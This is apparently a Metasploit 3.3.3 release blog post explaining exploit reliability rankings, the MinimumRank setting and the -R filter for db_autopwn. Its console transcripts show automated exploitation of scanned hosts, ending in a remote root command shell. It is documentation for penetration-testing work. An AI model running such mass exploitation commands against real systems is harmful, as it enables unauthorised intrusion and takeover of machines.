Metasploit Framework 3.3.3 Exploit Rankings

Last updated at Mon, 05 Feb 2024 21:05:55 GMT

This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on  exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to  prevent exploits below a certain rank from being used and limit the impact to a particular target.

The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The exploit rankings page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:

msf> search -r great

From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:

msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi
 
msf (exploit/ms08_067_netapi) > exploit

[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).

The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the Metasploit Framework NeXpose Plugin or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:

msf exploit(psexec) > db_autopwn -b -x -t          
[*]   XX.YY.44.223:1220  exploit/unix/webapp/qtss_parse_xml_exec  (CVE-2003-0050, BID-6954)
[*]   XX.YY.41.188:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.77.234:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.47.203:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.37.182:139  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.32.2:445  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.35.195:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.32.2:139  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.44.223:139  exploit/solaris/samba/trans2open  (CVE-2003-0201, BID-7294)
[*]   XX.YY.44.223:139  exploit/multi/samba/nttrans  (CVE-2003-0085, BID-7106)
[*]   XX.YY.47.203:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.47.203:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*]   XX.YY.72.243:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.72.243:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*]   XX.YY.37.182:445  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.34.236:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.41.188:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.41.188:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
 

msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*]   XX.YY.44.223:1220  exploit/unix/webapp/qtss_parse_xml_exec  (CVE-2003-0050, BID-6954)
[*]   XX.YY.77.234:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.35.195:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
 

msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
 

Active sessions
===============
  Id Description Tunnel Via
  --  -----------  ------  ---
  1   Command shell  192.168.198.128:45146 -> XX.YY.44.223:32554  unix/webapp/qtss_parse_xml_exec
 
msf exploit(psexec) > sessions -i 1 
[*] Starting interaction with 1...
 
uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC  Power Macintosh powerpc
 
id
uid=0(root) gid=0(wheel) groups=0(wheel)